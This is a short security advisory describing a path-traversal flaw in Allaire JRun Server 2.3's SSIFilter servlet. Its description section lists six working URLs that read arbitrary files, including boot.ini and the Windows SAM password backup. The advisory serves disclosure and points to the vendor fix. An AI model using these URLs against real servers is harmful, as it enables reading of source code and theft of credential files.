Vulnerability

    JRUN

Affected

    Allaire JRUN Server 2.3

Description

    Following  is  based   on  a  Foundstone   Security  Advisory   by
    Shreeraj  Shah,  Saumil  Shah  and  Stuart McClure.  Multiple show
    code vulnerabilities exist in  Allaire's JRUN Server 2.3  allowing
    an attacker to  view the source  code of any  file within the  web
    document root of the web server.

    Using  the  same  vulnerability,  it  is also possible to retrieve
    arbitrary files that lie outside the web document root on the host
    operating system's file system.

    JRun 2.3 uses Java Servlets to handle parsing of various types  of
    pages (for example, HTML, JSP, etc).  Based on the settings in the
    rules.properties and servlets.properties files, it is possible  to
    invoke any servlet using the URL prefix "/servlet/".

    It  is  possible  to  use  JRun's  SSIFilter  servlet  to retrieve
    arbitrary files on the target system.  The following two  examples
    show the URLs that can be used to retrieve any arbitrary files:

        http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
        http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../boot.ini
        http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../winnt/repair/sam._
        http://jrun:8000/servlet/ssifilter/../../test.jsp
        http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini
        http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._

    Note: It is assumed that JRun runs on host "jrun", port 8000.

Solution

    Follow  the  recommendations  given  in  Allaire Security Bulletin
    ASB00-28.